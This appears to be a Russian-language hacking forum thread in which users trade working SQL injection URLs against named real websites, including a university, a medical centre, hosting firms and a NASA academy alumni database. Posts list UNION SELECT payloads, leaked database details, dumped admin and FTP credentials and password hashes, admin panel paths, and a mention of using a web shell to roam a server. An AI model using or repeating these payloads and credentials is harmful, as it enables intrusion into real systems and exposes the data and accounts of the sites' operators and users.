http://www.autoexotica.ru/news/?nid=130+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,1/* Там стоит IPB PS: Поробуй почитай фак по скулям и раскрути
http://medcenter.kz/?mid=-1+union+select+1,concat(name,char(13),pass),3,4,5,6,7,8,9+from+users+limit+1,1-- login: mcadmin pass: ordamed.kz
Code: http://www.espacejavascript.com/script.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4/*
Вот такой вот БОЛТ )) Version: 5.0.18-nt Dbname: iqc Username: [email protected] ничего про юзеров(( ============================== PR-4 фест какой то..виндовый хостинг. Username:nakusp@localhost Database:nakusp Version:5.0.45-community-nt
Довел инъекцию Fugitif. Code: http://www.espacejavascript.com/script.php?id=-1' http://www.espacejavascript.com/script.php?id=-1+union+select+1,2,3,version(),5,6,/* http://www.espacejavascript.com/script.php?id=-1+union+select+1,2,3,table_name,5,6 +from+infomation_schema.tables/* Выводятся все таблицы,я выбрал site_admins_annu. Колнки: login,pass. login: G1Script pass:931af583573227f0220bc568c65ce104
http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,email,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+users/* ничего полезного кроме мыл не нашел
ALL4HOSTING http://www.all4hosting.ru/ таблы Более менее интересной показалась idClient Но там всего два юзера, и то западло какоето: + system_user:allforhosting @@version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) db_name():allforhosting
http://www.davisvisitor.com/sub_hotels.php?id=9&city=-1+union+select+1,version(),3,4,5,6,7,8/* version 4.0.16
http://www.michaelpollan.com/article.php?id=-87+union+select+1,version(),database(),4,5,6,user(),8,9,0/* version: MYSQL 4.1.22-standard database: pollan_articles user: pollan_article@localhost
Sql Inj Palit.biz Combined.biz Plusline.org Talk.biz Cyberthing.net Interprice.biz Ransomes-jacobsen.biz Talant.biz 3 ver. by vital & jokester
Code: http://news.udaff.com POST-инъект Code: http://news.udaff.com/index.php cat=korresp&korrname='+union+select+1,concat_ws(0x3a,login,password),3+from+USERS+limit+0,1/* inzzz:6af0088fc7c444ab185664fc4625b44a:bugaga
Немного о вине =) Code: http://www.dionysos-mereni.com/news.php?id=220+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8+from+admintable/* Табличку не подобрал =)
Премного извинюсь, ибо в бояне есть http://odmu.edu.ua Если господа модераторы сочтут, что данный пост есть зло - честно обзусь моментально удалить. Дело в том, что по поиску не нашел описания хека данного ресурса. Вдобавок есть куча смежных поддоменов к данному сайту. В общем раскрутил - если что - удалю... http://odmu.edu.ua/index.php?v=-1+union+select+1,2,concat(username,0x3a3a,password),4,5,6+from+proftpd.users+limit+0,100/* Выборка по ftp юзерам osas:::Z5ESqlRtTrt7Y anatomka::gwl.XrN4bs1o phosas:::KGt4CWj1zvBWc osasod:::JO96GZfMHu0BU adminweb:::MEDINedu sopott:::M.NEksFkXBxfk admfoto::WJc7OVOTQRkFs userfoto::RsRvTv93 biophys:::gjtqJLxY0FDrM ftp://217.146.249.35 <-тыкаем сюда -------------------------------- пример: login: biophys pass: gjtqJLxY0FDrM http://www.biophys.odmu.od.ua/ login: adminweb pass: MEDINedu ftp://www.odmu.edu.ua/ http://www.odmu.edu.ua/_.php <-админка Пароль: k.,bvfz ie,rf С помощью шела путешествуем по серверу на котором висит все это чудо.
Code: http://www.lyapis.com/anons.php?id=5+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
Code: http://fiske.colorado.edu/staff/index.php?id=-2+union+select+1,2,3,concat(table_schema,char(58),table_NAME),5,6,7,8+from+INFORMATION_SCHEMA.tables+limit+17,1/*
Академия Наса.. ))) http://www.nasa-academy.org/db/yearbookview.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a,'<b>',middlename,0x3a3a,login,0x3a3a,password,0x3a3a,password_expire,'</b>'),10,11,12,13+from+academy.alumni+limit+31,60/* Выборка по юзерам. http://www.nasa-academy.org/db/login.php аутентификация Шняга: х*** пойми как захеширован пароль. ибо некоторые побдираются, но система не логинится. МБ дабл хеш? К тому же походу file_priv разрешены, но пути х** нарыл...
www.mirtravel.com Code: http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(table_name,0x3a,column_name)+FROM+information_schema.columns/* Code: http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(nusr,0x3a,pusr)+FROM+usr/* mir:4b53ed9250ece8ed admin:e1eba9bbbb04da14e0f0b1cec9eea708:zzz123 Это логин под форум по ходу, а админка без пароля штоле http://www.mirtravel.com/admin/
Что значит похоже на ордер бай? order by ето оператор он не пожет быть похож или нет... он в вводить при правильном значении..... а так если подставить кавычку там скули нет... там про100 ошибка обращения.